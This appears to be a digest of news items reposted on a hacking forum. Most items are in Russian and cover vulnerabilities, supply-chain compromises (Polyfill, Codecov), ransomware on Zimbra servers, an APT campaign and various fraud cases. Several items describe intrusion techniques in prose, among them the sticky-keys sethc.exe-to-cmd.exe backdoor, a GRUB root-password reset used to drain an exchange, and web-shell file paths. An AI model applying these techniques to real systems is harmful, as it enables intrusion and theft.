Таганский районный суд Москвы наложил административный штраф в размере 3,5 млн рублей на компанию Mozilla Corporation, известную как разработчик браузера Mozilla Firefox, за неисполнение обязанности по удалению информации, запрещённой законодательством Российской Федерации. Об этом сообщили в официальном Telegram-канале московских судов общей юрисдикции.
Суд признал Mozilla Corporation виновной в нарушении требований части 2 статьи 13.41 Кодекса об административных правонарушениях РФ, регулирующей обязательства владельцев сайтов и информационных ресурсов по удалению запрещённой информации.
t.me/moscowcourts/5153
Исследование компании GitGuardian выявило новую угрозу в мире информационной безопасности, связанную с технологией Docker. Даже после удаления образов Docker, их компоненты — так называемые «зомби-слои» — могут продолжать существовать в реестрах, оставаясь потенциальным источником утечек конфиденциальной информации. Это явление обнаружено в таких платформах, как Amazon Web Services ECR, DockerHub, GitHub Packages и Quay.io.
«Зомби-слои» — это остатки данных, которые продолжают храниться в реестре на протяжении недель и месяцев, даже после того как связанные с ними Docker- образы были удалены. Это становится особенно опасным, когда удаленные слои содержат конфиденциальные данные, такие как пароли, токены доступа или приватные ключи.
В рамках исследования было проведено экспериментальное тестирование, во время которого исследователи загрузили и затем модифицировали Docker-образ, удаляя слой с конфиденциальной информацией. Проверка показала, что удаленный слой продолжает существовать в реестре и доступен для скачивания. Это подтвердило, что реестры не всегда немедленно удаляют неиспользуемые слои, что создает серьезные риски безопасности.
Руководство больницы №20 в Петербурге с помощью мошеннической схемы смогло купить себе элитную недвижимость.
Квартиры руководства городской больницы №20 в Петербурге все утро 1 октября обыскивали полицейские. К верхушке медучреждения нагрянули из-за дела о крупном мошенничестве. И посмотреть в их квартирах было на что. Дорогостоящий ремонт, золотые люстры, панорамные окна с шикарным видом на Москву-Сити с высоты птичьего полета, отдельные гардеробные с брендовыми вещами и люксовыми сумками, а также загородные дома с личным бассейном. Казалось бы, все это не могут себе позволить врачи с их-то зарплатами. Но «мертвые души» позволили руководству больницы незаконно сколотить целое состояние и обзавестись элитной недвижимостью.
На деньги от криминального бизнеса руководство больницы покупало брендовые вещи и сумки, а также делало дорогой ремонт.
Как ранее сообщали в ГУ МВД России по Петербургу и Ленобласти, некоторые руководители и сотрудники горбольницы с 2021 года «трудоустраивали» к себе родственников и знакомых. То есть они на бумаге были водителями, регистраторами, операторами ЭВМ и уборщиками, но на деле никогда не работали в медучреждении. При этом зарплата им начислялась. Впоследствии их перераспределяли между собой участники криминального бизнеса.
- Фиктивно оформленным сотрудникам начислялись гораздо большие суммы, чем другим. Например, задокументированный доход двоих из них за три года составил не менее 82 млн рублей, - добавили в ведомстве.
Мошенническая схема также позволила купить загородные дома с бассейнами. Фото: ГУ МВД России по Петербургу и Ленобласти.
По оперативным данным, по мошеннической схеме в больницу были трудоустроены десятки человек. Совокупный ущерб бюджету может составлять около 1 млрд рублей.
Microsoft обнаружила две уязвимости в Rockwell Automation PanelView Plus, которые могут быть использованы удаленными неавторизованными злоумышленниками для выполнения произвольного кода и вызова состояния отказа в обслуживании (DoS).
«Уязвимость [выполнения произвольного кода] в PanelView Plus связана с двумя пользовательскими классами, которые могут быть использованы для загрузки и выполнения вредоносной DLL в устройстве», - сказал исследователь безопасности Юваль [Гордон](https://www.microsoft.com/en- us/security/blog/2024/07/02/vulnerabilities-in-panelview-plus-devices-could- lead-to-remote-code-execution/).
«Уязвимость DoS использует тот же пользовательский класс для отправки сформированного буфера, который устройство не может правильно обработать, что приводит к DoS».
Перечень недостатков следующий:
Успешная эксплуатация этих двух уязвимостей позволяет злоумышленнику удаленно выполнять код, получать доступ к информации или вызывать состояние DoS.
CVE-2023-2071 затрагивает FactoryTalk View Machine Edition (версии 13.0, 12.0 и предыдущие), а CVE-2023-29464 затрагивает FactoryTalk Linx (версии 6.30, 6.20 и предыдущие).
Следует отметить, что уведомления об этих уязвимостях были выпущены Rockwell Automation [12 сентября](https://www.rockwellautomation.com/en-us/trust- center/security-advisories/advisory.PN1645%20.html) 2023 года и [12 октября 2023](https://www.rockwellautomation.com/en-nl/trust-center/security- advisories/advisory.PN1652.html) года соответственно. Агентство кибербезопасности и инфраструктурной безопасности США (CISA) выпустило свои[ предупреждения 21](https://www.cisa.gov/news-events/ics- advisories/icsa-23-264-06) сентября и [17 октября](https://www.cisa.gov/news- events/ics-advisories/icsa-23-290-02).
Раскрытие уязвимостей произошло на фоне предполагаемой эксплуатации неизвестными злоумышленниками недавно обнаруженной критической уязвимости в HTTP File Server (CVE-2024-23692, CVSS score: 9.8) для распространения криптомайнеров и троянов, таких как[ Xeno RAT](https://hunt.io/blog/good-game-gone-bad-xeno-rat-spread-via-gg-domains- and-github), Gh0st RAT и PlugX.
Эта уязвимость, описываемая как инъекция шаблонов, позволяет удаленному неавторизованному злоумышленнику выполнять произвольные команды на пораженной системе путем отправки специально сформированного HTTP-запроса.
Источник : <https://thehackernews.com/2024/07/microsoft-uncovers-critical-
flaws-in.html>
перевести для XSS.is
Более 110 тысяч сайтов, использующих открытую JavaScript-библиотеку Polyfill для обеспечения совместимости со старыми версиями браузеров, [стали жертвой вредоносных изменений](https://sansec.io/research/polyfill-supply-chain- attack), внесённых в код библиотеки новым владельцем проекта. В библиотеку, загружаемую на сайты через домен cdn.polyfill.io, был встроен вредоносный код, перенаправляющий пользователя на мошеннические сайты (например, googie- anaiytics.com), букмекерские конторы и online-казино.
Проект Polyfill в феврале был продан компании Funnull из Китая, которая получила доступ к учётной записи на GitHub и сайту polyfill.io. Спустя несколько месяцев после приобретения новый владелец организовал жульническую схему монетизации, связанную с перенаправлением части пользователей на сомнительные сайты. Перенаправление срабатывало с некоторой вероятностью, в определённые часы и при соблюдении условий, таких как открытие сайта с мобильного телефона и отсутствие Cookie, сигнализирующих, что страницу открыл администратор сайта. При выявлении на сайте систем web-аналитики, редирект задерживался на несколько секунд, чтобы не засветиться в статистике таких систем.
Примечательно, что новый владелец [удаляет из GitHub](https://web.archive.org/web/20240229113710/https://github.com/polyfillpolyfill/polyfill- service/issues/2834) любые жалобы, указывающие на подозрительную активность или смену владельца, и, видимо, рассчитывает на то, что пользователи посчитают автоматический переход инициативой авторов изначально открываемых сайтов.
Пользователям Polyfill рекомендуется как можно скорее удалить код для загрузки библиотеки через хост cdn.polyfill.io. Отмечается, что в современных реалиях потребности в Polyfill больше нет, так как все основные браузеры в должной мере поддерживают Web API (Polyfill динамически оценивает текущий браузер по заголовку User Agent и для устаревших браузеров генерирует функции с реализацией недостающих методов, свойств и API).
Те, кому Polyfill по-прежнему необходим, могут воспользоваться вариантами библиотеки, распространяемыми компаниями [Fastly](https://community.fastly.com/t/new-options-for-polyfill-io- users/2540) и [Cloudflare](https://blog.cloudflare.com/polyfill-io-now- available-on-cdnjs-reduce-your-supply-chain-risk), или могут использовать на своём сервере локальную копию на основе кода из репозитория с форком, созданным изначальным автором проекта. Зеркала были созданы в феврале из-за сомнений в благонадёжности нового владельца домена polyfill.io.
Оперативники выяснили, что аферист приобретал в закрытых группах одного из мессенджеров сим-карты, а также абонентские номера с логинами для входа в личный кабинет приложений онлайн-банков граждан. В первом случае подозреваемый использовал в своей преступной деятельности сим-карты, номера которых были привязаны к порталу, предоставляющему государственные услуги. Фигурант менял пароль от личного кабинета гражданина и впоследствии получал полный доступ к персональным данным. Пользуясь этим, мошенник оформлял в микрофинансовых организациях кредиты и переводил полученные средства на подконтрольные счета подставных лиц.
По оперативной информации, злоумышленник использовал более 300 абонентских номеров, каждый из которых принадлежал конкретному гражданину.
Во втором случае злоумышленник действовал аналогично, только все операции проводил в личных кабинетах пользователей онлайн-приложений различных банков.
В ходе акта обследования, а также проведенного обыска в жилище задержанного изъято 287 сим-карт, 6 мобильных телефонов, ноутбук, банковские карты и другие предметы, имеющие доказательственное значение для уголовных дел.
Предварительно установлено, что от мошеннических действий задержанного пострадали 22 жителя из разных регионов России. В общей сложности граждане лишились более 10 миллионов рублей.
В настоящее время сотрудники УБК ГУ МВД России по Ростовской области проводят необходимые мероприятия, направленные на установление дополнительных эпизодов преступной деятельности задержанного.
В отношении злоумышленника следователями возбуждены уголовные дела по признакам преступлений, предусмотренных частью 3 статьи 159 УК РФ и частью 2 статьи 272 УК РФ. Фигурант задержан в порядке статьи 91 УПК РФ.
38-летнему жителю американского городка Кейп-Жирардо (штат Миссури) надоело пробовать себя в роли кардера, поэтому он пошел на кражу со взломом, чтобы достать быстрые деньги. Однако полицейским всего за два дня удалось вычислить грабителя. Придя к Энтони Сейгерсу домой с обыском, они обнаружили ([https://www.msn.com/en-us/news/crim...han-30-people-found-at-man-s-home/ar- BB1l8u74](https://www.msn.com/en-us/news/crime/police-ids-birth-certificates- from-more-than-30-people-found-at-man-s-home/ar-BB1l8u74)) документы и банковские карты других людей.
Отмечается, что мошенник хранил все имевшиеся у него водительские права, свидетельства о рождении и карточки социального страхования в одном рюкзаке. Известно, что они настоящие и принадлежат 33 разным людям, ни один из которых не является Сейгерсом. Там же следователи обнаружили несколько кредитных и дебетовых карт.
Мужчине уже предъявлено обвинение в торговле украденными личными данными. Этот пункт дополнил первоначальный — про кражу. Сейгерс содержится в местной окружной тюрьме и может выйти под залог в 20 тысяч долларов.
sc: msn.com/en-us/news/crime/police-ids-birth-certificates-from-more- than-30-people-found-at-man-s-home/ar-BB1l8u74
Среди пострадавших - граждане Польши, Чехии и Словакии. В настоящее время установлено 16 иностранцев, ставших жертвами финансовых махинаций.
Разоблачили функционирование «колл-центра» на территории города Тернополь оперативники Департамента стратегических расследований совместно со следователями Главного следственного управления Нацполиции и сотрудниками управления уголовного розыска областной полиции. Установлено, что группа лиц «специализировалась» на мошенническом завладении средствами иностранных граждан в особо крупных размерах, используя для этого офисные помещения с установленным специализированным оборудованием.
Сотрудников колл-центра тщательно подбирали: для беспрепятственного общения с потенциальными жертвами персонал должен был владеть иностранным языком на высоком уровне. Работали операторы по имеющимся клиентским базам, которые предварительно скупали на DarkNet.
Представляясь сотрудниками финансовых учреждений, злоумышленники выспрашивали у владельцев банковских счетов их личные данные. Для этого использовали как психологические методы воздействия, так и разработанную заранее инструкцию. Для лучшей коммуникации последняя была прописана на польском и словацком языках.
Также операторы колл-центра предлагали гражданам стран ЕС еще одну мошенническую схему - инвестировать личные средства в так называемые «брокерские» проекты с потенциально высокой и быстрой прибылью.
Получив все необходимые банковские данные, правонарушители переводили денежные средства пострадавших на отдельные электронные кошельки и банковские карты. В дальнейшем полученные средства злоумышленники конвертировали в наличные на территории Украины.
Ежемесячный доход от противоправной деятельности международного колл-центра составлял около 100 000 долларов. Сейчас следствием установлено, что по такой схеме злоумышленники обманули 16 граждан Польши и Словакии на десятки тысяч долларов.
13 февраля правоохранители при процессуальном руководстве Офиса Генерального прокурора провели обыск по месту нахождения офисного помещения на территории города Тернополь. В результате прекратили деятельность мошеннического колл- центра, изъяли компьютерную технику, более сотни мобильных телефонов, «черновую» документацию и записи.
Сейчас проводятся дальнейшие мероприятия для установления организаторов международной мошеннической схемы и других причастных лиц.
Уголовное производство расследуется по ч. 5 ст. 190 (Мошенничество) Уголовного кодекса Украины.
Следствие продолжается.
В коде файловой системы XFS [обнаружена](https://seclists.org/oss- sec/2022/q1/17) [уязвимость](https://www.virtuozzo.com/company/blog/xfs-file- system-vulnerability-cve-2021-4155) ([CVE-2021-4155](https://security- tracker.debian.org/tracker/CVE-2021-4155)), позволяющая локальному непривилегированному пользователю читать данные неиспользуемых блоков напрямую с блочного устройства. Все значительные версии ядра Linux старше 5.16, содержащие драйвер XFS, подвержены этой проблеме. Исправление вошло в версию 5.16, а также в обновления ядер 5.15.14, 5.10.91, 5.4.171, 4.19.225 и т.д.
Уязвимость вызвана некорректным поведением двух специфичных для XFS ioctl(XFS_IOC_ALLOCSP) и ioctl(XFS_IOC_FREESP), которые являются функциональным аналогом общеядерного системного вызова fallocate(). При увеличении размера файла, не выровненного на размер блока, ioctl XFS_IOC_ALLOCSP/XFS_IOC_FREESP не обнуляют хвостовые байты до следующей границы блока. Таким образом, на XFS со стандартным размером блока 4096 байт из каждого блока атакующий может прочитать до 4095 байт предыдущих записанных данных. В указанных областях могут содержаться данные удалённых файлов, дефрагментированных файлов, а также файлов с дедуплицированными блоками.
Проверить свою систему на наличие проблемы можно с помощью простого прототипа эксплоита. Если после выполнения предложенной последовательности команд удастся прочитать текст Шекспира, то драйвер ФС уязвим. Изначальное монтирование раздела XFS для демонстрации требует прав суперпользователя.
Поскольку ioctl(XFS_IOC_ALLOCSP) и ioctl(XFS_IOC_FREESP) по функциональности практически не отличаются от стандартного fallocate(), и единственным их отличием является утечка данных, их наличие похоже на бекдор. Несмотря на общую политику – не изменять существующие интерфейсы в ядре, – по предложению Линуса, принято решение полностью удалить эти ioctl'ы в следующей версии.
Управление Следственного комитета по Гомельской области расследует уголовное дело в отношении жителя Гомельской области, который обвиняется в хищении у банка Br1,7 млн, сообщил корреспонденту БЕЛТА заместитель начальника УСК по Гомельской области Александр Гриньков.
Установлено, что с 6 по 9 января этого года мужчина совершил 51 обменную операцию на электронной торговой площадке одного из банков, где был ошибочно выставлен курс обмена российского рубля в белорусский - Br3,43 за один российский рубль (вместо 100 российских рублей).
Техническую ошибку банка мужчина обнаружил еще 6 января, однако никому о ней не сообщил. Он понял: при конвертации российского рубля в белорусский будет получать в 100 раз больше, чем при обмене по действующему курсу.
Мужчина отправился в кассу банка, чтобы внести на свой счет электронной торговой площадки в российских рублях сумму, эквивалентную $200. Затем стал проводить операции по конвертации различных валют. "Получаемые белорусские рубли конвертировал в доллары США и евро, а за них приобретал по рыночному курсу российские рубли, которые конвертировал со 100-кратной выгодой в белорусские. В результате житель региона получил на свой счет более Br1,73 млн вместо Br17,34 тыс. Похищенные деньги мужчина частично перевел на счета других банков, а часть обналичил в банкоматах Гомеля", - уточнил заместитель начальника УСК.
Банк обнаружил ошибку и пропажу денег и обратился к мужчине. Фигурант вернул Br266 тыс., однако затем стал уклоняться от возмещения ущерба. Банк обратился в милицию.
В настоящее время обвиняемый находится под стражей. "Принимаются меры по возмещению ущерба. На деньги, находящиеся в банках, наложен арест", - добавил Александр Гриньков.
Заместитель начальника УСК отметил, что мужчина был единственным, кто использовал техническую ошибку банка. "Стоит напомнить, что за совершение активных действий и намеренное использование технической ошибки в корыстных целях, в результате которых удается завладеть имуществом юрлица на сумму свыше 10 базовых величин (1 БВ - Br29), предусмотрена уголовная ответственность", - заключил Александр Гриньков.
Сотрудники подразделений по противодействию киберперступности УВД Брестчины и Ленинского РОВД установили 21-летнего брестчанина, который с использованием вредоносного программного обеспечения получал доступ к чужим аккаунтам в социальной сети.
Установлено, что фигурант взламывал учетные записи, а затем на специализированных форумах совершал сделки по продаже чужих логинов и паролей. Всего с января 2022 года по сентябрь 2023 он продал данные не менее 28 тысяч аккаунтов.
В ходе осмотра по месту жительства у брестчанина изъято около 9 тысяч рублей, почти 6 тысяч долларов, а также компьютерная техника, которая использовалась при совершении преступлений.
Следователями возбуждены уголовные дела за использование либо распространение вредоносных программ и несанкционированный доступ к компьютерной информации.
Комментарий начальника ОПК Ленинского РОВД Бреста Александра Позняка.
Governmental entities in the Middle East and Africa have been at the receiving end of sustained cyber-espionage attacks that leverage never-before-seen and rare credential theft and Exchange email exfiltration techniques.
"The main goal of the attacks was to obtain highly confidential and sensitive information, specifically related to politicians, military activities, and ministries of foreign affairs," Lior Rochberger, senior threat researcher at Palo Alto Networks, said in a technical deep dive [published](https://www.paloaltonetworks.com/blog/security-operations/through- the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in- the-middle-east-and-africa/) last week.
The company's Cortex Threat Research team is [tracking](https://unit42.paloaltonetworks.com/from-activity-to-formal- naming/) the activity under the temporary name CL-STA-0043 (where CL stands for cluster and STA stands for state-backed motivation), describing it as a "true advanced persistent threat."
The infection chain is triggered by the exploitation of vulnerable on-premises Internet Information Services ( [IIS](https://learn.microsoft.com/en- us/iis/get-started/introduction-to-iis/introduction-to-iis-architecture) ) and Microsoft Exchange serves to infiltrate target networks.
Palo Alto Networks said it detected failed attempts to execute the [China Chopper](https://thehackernews.com/2023/04/chinese-hackers-using-pingpull- linux.html) web shell in one of the attacks, prompting the adversary to shift tactics and leverage an in-memory Visual Basic Script implant from the Exchange Server.
A successful break-in is followed by reconnaissance activity to map out the network and single out critical servers that hold data of value, including domain controllers, web servers, Exchange servers, FTP servers, and SQL databases.
CL-STA-0043 has also been observed leveraging native Windows tools for privilege escalation, thereby enabling it to create admin accounts and run other programs with elevated privileges.
Another privilege escalation method entails the abuse of accessibility features in Windows – ie, the " sticky keys " utility (sethc.exe) – that makes it possible to bypass login requirements and backdoor the systems.
"In the attack, the attacker usually replaces the sethc.exe binary or pointers/references to these binaries in the registry, with cmd.exe," Rochberger explained. "When executed, it provides an elevated command prompt shell to the attacker to run arbitrary commands and other tools."
A similar approach employing the Utility Manager (utilman.exe) to establish persistent backdoor access to a victim's environment was [documented](https://thehackernews.com/2023/04/hackers-using-self-extracting- archives.html) by CrowdStrike earlier this April.
Besides using Mimikatz for credential theft, the threat actor's modus operandi stands out for utilizing other novel methods to steal passwords, conduct lateral movement, and exfiltrate sensitive data, such as -
It's worth pointing out that the use of Exchange PowerShell snap-ins to export mailbox data has been previously reported in the case of a Chinese state- sponsored group dubbed [Silk Typhoon](https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day- flaws.html) (formerly Hafnium), which first came to light in March 2021 in connection with the exploitation of Microsoft Exchange Server.
"This activity group's level of sophistication, adaptiveness, and victimology suggest a highly capable APT threat actor, and it is suspected to be a nation- state threat actor," Rochberger said.
Source - THN
Начинающие хактивисты MalasLocker плотно взялись за шифрование серверов Zimbra.
Новая вымогательская операция MalasLocker, активная с конца марта этого года, взламывает, похищает и шифрует данные на серверах Zimbra. Однако вместо того, чтобы требовать привычный денежный выкуп, хакерам достаточно пожертвования в благотворительные фонды, чтобы предоставить жертвам дешифратор и предотвратить утечку данных.
Многочисленные жертвы на форумах Zimbra сообщают о подозрительных файлах JSP, загруженных в папки «/opt/zimbra/jetty_base/webapps/zimbra/» или «/opt/zimbra/jetty/webapps/zimbra/public». Эти файлы были замечены под разными именами, включая info.jsp, noops.jsp и heartbeat.jsp, Startup1_3.jsp.
Исследователь безопасности MalwareHunterTeam сообщил, что к зашифрованным файлам добавляется сообщение «Этот файл зашифрован, ищите README.txt для получения инструкций по расшифровке».
При открытии вышеупомянутой записки README.txt можно обнаружить следующий текст: «В отличие от классических групп вымогателей, мы не просим вас присылать нам деньги. Мы просто не любим корпорации и экономическое неравенство. Мы просто просим вас сделать пожертвование некоммерческой организации, которую мы одобряем. Это беспроигрышный вариант, и вы, вероятно, сможете получить налоговый вычет и хороший пиар от вашего пожертвования», — говорится в записке MalasLocker.
Хотя записка о выкупе не содержит ссылки на сайт утечки данных банды вымогателей, исследователи всё же отыскали сайт. Главная страница сайта содержит длинное сообщение, заполненное смайликами, раскрывающее мотивы группы и повествующее о том, что данные киберпреступники — начинающие вымогатели, и нацелены в первую очередь на небольшие компании со слабой защитой.
«Мы — новая группа вымогателей, которая шифрует компьютеры компаний, чтобы попросить их пожертвовать деньги кому угодно. Мы просим их сделать пожертвование в некоммерческую организацию по их выбору, а затем сохранить полученное электронное письмо с подтверждением пожертвования и отправить его нам, чтобы мы могли проверить подпись DKIM, чтобы убедиться, что электронное письмо настоящее», — говорится на сайте утечки данных MalasLocker.
Это требование выкупа очень необычно и, по правде говоря, больше относит данную вымогательскую операцию к сфере хактивизма. В сети пока что довольно мало информации об этой группировке и их «благотворительной операции», поэтому неясно, сдержат ли хакеры своё слово после денежного перевода, однако сам подход у них поистине интересный. С такими альтруистическими мотивами группировка быстро завоюет популярность и, возможно, даже народную симпатию.
source: forums.zimbra.org/viewtopic.php?t=71867
Молодой человек решил протестировать свои скилы.
Уголовное дело в отношении молодого человека по ч. 1 ст. 272 УК России
"Неправомерный доступ к охраняемой законом компьютерной информации" прекращено
Студент Новосибирского государственного технического университета (НГТУ)
оштрафован на 10 000 рублей за взлом сайта своего вуза. Об этом говорится на
сайте Ленинского районного суда города Новосибирска.
Согласно источнику, студент проник в базу данных сайта университета и получил доступ к личным данным сотрудников и студентов. Помимо этого, он скачал ответы на тестовые задания и разместил их в открытом доступе в соцсети.
Взлом был обнаружен сотрудниками службы безопасности вуза, после чего приняты меры по устранению последствий и предотвращению дальнейших вторжений. Студент был задержан и передан в полицию.
Расследование выявило, что молодой человек имел навыки в области информационной безопасности и использовал их для незаконного проникновения в систему.
Студенту было предъявлено обвиняли по части 1 статьи 272 УК России (неправомерный доступ к охраняемой законом компьютерной информации). Тем не менее, суд решил прекратить уголовное дело и назначить молодому человеку штраф в размере 10 000 рублей.
В свою защиту студент заявил, что не имел злого умысла и взломал сайт только для того, чтобы проверить его уязвимости и протестировать свои навыки.
Университет в свою очередь напоминает, что нарушение информационной безопасности является серьезным правонарушением и призывает студентов соблюдать закон.
Telegram has fixed a security issue where self-destructing audio and video files were not being deleted from user's macOS devices as expected.
Telegram offers a 'Secret Chat' mode that offers increased privacy than the standard chats.
When in a Secret Chat, the connections are all end-to-end encrypted, you can't
forward messages to other users, and all messages and media can be configured
to automatically self-destruct and be removed from all devices after a certain
amount of time.
Yesterday, security researcher Dhiraj Mishra told BleepingComputer that he
discovered a vulnerability in the Secret Chat feature on Telegram 7.3 for
where self-destructing media is deleted from recipients' devices.
While this path would not be leaked in Secret Chats, received media would
still be stored in that same folder.
"In my case the path was (/var/folders/x7/khjtxvbn0lzgjyy9xzc18z100000gn/T/). While performing the same task under secret chat option the MediaResourceData(path://) URI was not leaked but the recorded audio/video message still gets stored on the above path," Mishra explained in a report on the vulnerability.
Dishra discovered that when the media self-destructed and was removed from the chat, the actual media files were still accessible in the computer's folder.
"Bob (Attacker using tdesktop macOS) & Alice (Victim) they are communicating
under secret chat option and Alice send a recorded audio/video message to Bob
with a self-destructed timer of 20 seconds."
"However the recorded message gets deleted from the chat after 20 seconds but
still remains under Bob's custom path, over here Telegram fails to prevent the
privacy for Alice. In general the functionality of self-destructing and
leaving no traces failed," Mishra explains in an attack scenario shared with
bleepingcomputer[.]
This bug is particularly concerning for users who may be sending very sensitive video to other Telgrams users under the expectation that the app will automatically remove them after a set time.
In addition to the Secret Chat security issue, Mishra discovered that Telegram was storing user's local passcodes to unlock the app in plain text on the device.
These plaintext passcodes were saved in the Users/[username]/Library/Group
Containers/6N38VWS5BX.ru.keepcoder.Telegram/accounts-metadata as a JSON file.
Dishra reported both of these vulnerabilities on December 26th, 2020, and they
are now fixed in Telegram 7.4.
For reporting both bugs, Mishra received a security bounty of $3,000 from Telegram.
Представители Rapid7 [сообщили](https://www.rapid7.com/blog/post/2021/05/13/rapid7s-response-to- codecov-incident/), злоумышленники получили доступ к исходному коду компании после недавнего взлома онлайн-платформы для тестирования ПО Codecov. Ранее о компрометации из-за этой атаки на цепочку поставок также сообщали разработчики софта из компании [Hashicorp](https://discuss.hashicorp.com/t/hcsec-2021-12-codecov-security- event-and-hashicorp-gpg-key-exposure/23512), облачный провайдер [Confluent ](https://www.confluent.co.uk/blog/confluent-update-regarding-codecov- incident/)и сервис голосовых вызовов Twilio.
Напомню, что в январе текущего года неизвестные злоумышленники сумели скомпрометировать Codecov и добавили сборщик учетных данных к одному из инструментов. Компрометация коснулась продукта Bash Uploader, который позволяет клиентам Codecov передавать отчеты о покрытии кода для анализа. При этом взлом был обнаружен только 1 апреля 2021 года.
Хакер получил доступ к скрипту Bash Uploader 31 января и постепенно вносил в него изменения, добавляя вредоносный код, который перехватывал загрузки, обнаруживал и собирал любую конфиденциальную информацию, включая учетные данные, токены и ключи. Точкой входа для злоумышленника стала ошибка, допущенная разработчиками в процессе создания образа Docker Codecov, которая позволила хакеру извлечь учетные данные, необходимые для внесения изменений в Bash Uploader.
На этой неделе представители Rapid7 заявили, что в компании использовался всего один экземпляр Codecov Bash Uploader, который применялся «на одном CI- сервере для тестирования и создания ряда внутренних инструментов для службы Managed Detection and Response». Однако злоумышленникам хватило и одного сервера.
«Неавторизованная сторона получила доступ к небольшому подмножеству наших репозиториев с исходным кодом для внутренних инструментов MDR. Эти репозитории содержали внутренние учетные данные, которые уже были обновлены, а также данные, связанные с предупреждениями, для ряда наших клиентов, использующих MDR», — гласит заявление компании.
Click to expand...
Хотя известно, что злоумышленники обращались к исходному коду компании, сообщается, они не изменяли исходники и не вмешивались в работу прочих корпоративных систем и производственных сред.
Похоже, Rapid7 пострадала из-за взлома Codecov сильнее других компании. Так, ранее сообщалось, что Hashicorp пришлось сменить приватный ключ GPG; в случае Confluent хакеры получили доступ к учетной записи GitHub, доступной только для чтения; а Twilio заявила, что доступа к конфиденциальным данным злоумышленники не получили вовсе.
Впрочем, еще в прошлом месяце ИБ-эксперты предупреждали, что взлом с Codecov мог затронуть сотни или даже тысячи компаний, однако обнаружение и расследование этих вторжений может занять недели и месяцы.
Бывший гендиректор Google призвал страны к сотрудничеству в области ИИ, чипов и квантовых вычислений.
Возможности Китая в области искусственного интеллекта и квантовых вычислений
стремительно догоняют США, сообщил изданию Nikkei Asia бывший генеральный
директор Google Эрик Шмидт (Eric Schmidt). По словам Шмидта, США не добьется
успеха без «очень прочного партнерства с Японией и Южной Кореей».
В итоговом отчете Комиссии национальной безопасности в области искусственного
интеллекта США [сообщалось](https://www.nscai.gov/wp-
content/uploads/2021/03/Full-Report-Digital-1.pdf) , что «если США не
предпримут никаких действий, то, вероятно, потеряют лидирующие позиции в
области ИИ в пользу Китая в следующем десятилетии и станут более уязвимыми к
целому ряду угроз с использованием ИИ со стороны государственных и
негосударственных субъектов».
По словам Шмидта, для победы в технологическом соревновании с Китаем США
должны сохранить лидерство в «стратегических» областях, таких как
искусственный интеллект, полупроводники, энергетика, квантовые вычисления и
синтетическая биология. А для этого «нужны более тесные отношения с
южнокорейскими и японскими исследователями, университетами и правительствами».
Шмидт предложил создать координационную группу в Вашингтоне для поддержания
связи с японской стороной и группу партнеров в Токио наряду с аналогичными
договоренностями с другими странами-партнерами.
Существует «простое убеждение», что «Китай — враг США, и американцы должны
прекратить торговать и работать с ними», отметил Шмидт. Специалист
охарактеризовал эти отношения как «конкурентное партнерство», указав
здравоохранение и изменение климата как области потенциального сотрудничества
в нестратегических областях
26-летний житель индийского штата Карнатака Шрикришна Рамеш дал показания о своей причастности ко взлому нескольких интернет-сервисов, в том числе криптовалютных бирж Bitfinex и BTC-e. Об этом сообщает издание India Today.
«Bitfinex стала для меня первым крупным взломом биткоин-биржи, — приводят его слова местные СМИ. – Биржу взламывали дважды; я был первым. Я воспользовался багом в дата-центре, который предоставил мне KVM-доступ к серверу. Я перезагрузил сервер в режиме GRUB, сбросил корневой пароль, вошел, сбросил пароль сервера для вывода средств и перевел деньги в биткоине на мой биткоин- кошелек».
Bitfinex впервые была взломана в мае 2015 года, потеряв тогда 1 500 BTC или около $400 000. Также биржа подверглась хакерской атаке в августе 2016 года, однако ущерб тогда был более значительным – 120 000 BTC или $72 млн по курсу на тот момент.
В ходе допроса преступник сознался, что уже давно взламывает разные площадки, в число которых вошли криптовалютные биржи и платформы для игры в покер. Рамеш утверждает, что он украл 100 BTC с Bitclub Network и криптоактивы на сумму более $3 млн с уже не работающей биржи BTC-e. В общей сложности хакеру удалось завладеть 20 008 BTC, однако почти все деньги он потратил на роскошный образ жизни.
Рамеш был арестован в ноябре 2020 года по делу о наркотиках. Впоследствии помимо прочего он рассказал о взломе портала госзакупок, онлайн-игры Runescape и покерных сайтов.
• Source: [https://www.indiatoday.in/india/sto...-police-statement- bitfinex-1876034-2021-11-12](https://www.indiatoday.in/india/story/karnataka- bitcoin-scam-srikrishna-ramesh-police-statement-bitfinex-1876034-2021-11-12)
Source:
Autonews ](https://www.autonews.ru/news/619936b39a79471a7413a98c)
В аварии на Кутузовском проспекте погибли автоблогер Саид Губденский и его пассажир. Автомобилист выехал на встречную полосу, столкнувшись с двумя машинами
www.autonews.ru
В центре Москвы на Кутузовском проспекте произошла крупная авария с участием трех автомобилей. По данным телеграм-канала 112, в ДТП погибли два человека — автоблогер Саид Губденский и президент федерации автомобильного и мотоциклетного спорта Дагестана Заур Ибрагимов. На магистрали в сторону центра образовалась большая пробка, а для регулирования проезда было организовано реверсивное движение. Об этом сообщает телеграм-канал Госавтоинспекции Москвы.
Видео: https://t.me/breakingmash
По предварительной информации, водитель BMW, ехавший в область, совершил выезд на встречную полосу. Там машина столкнулась с автомобилями Volvo и Mercedes. Водитель BMW, которым был Губденский, погиб на месте, а пассажир Ибрагимов умер в больнице.
По данным телеграм-каналов Mash и 112, пострадавший в аварии Mercedes принадлежит бизнесмену Ратмиру Тимашеву, основавшему компании Aelita Software и Veeam Software. Тимашев находится на 168-м месте в рейтинге 200 самых богатых российских предпринимателей 2021 года. На 2020 год его состояние оценивается в $750 млн. Представитель Veeam Software заявил РБК, что Тимашев и члены его семьи не находятся в России, и никто из них не стал участником ДТП.
У экс-главы совета директоров «Дил-банка» Кирилла Салтыкова неизвестные похитили 335 тыс долларов, что эквивалентно 30 млн рублей. Об этом сообщает Baza.
Предприниматель обратился в полицию. По его словам, с 2020 года деньги хранились на криптокошельке на платформе Exodus. На днях он зашел в личный кабинет, однако вместо шестизначных цифр увидел ноль. По его словам, пароль от кошелька кроме него никто не знал.
Чуть больше месяца назад Салтыкова осудили по делу о хищении свыше 1,3 млрд рублей из негосударственного пенсионного фонда «Благовест». Разбирательство по статье о злоупотреблении полномочиями продолжалось с 2015 года.
36-летнюю Анну А. приняли польские погоны по подозрению в двух ограблениях с ножом в банках в населенных пунктах Куруве и Пулавы.
Задержанной было предъявлено обвинение по двум пунктам: в грабеже с применением холодного оружия и нанесении легких телесных повреждений.
Подозреваемая призналась. То есть это не фейк. Она объяснила, что ей нужны были деньги
Её профит составил более 1 100 000₽ по текущему курсу.
Ей грозит до 20 лет.
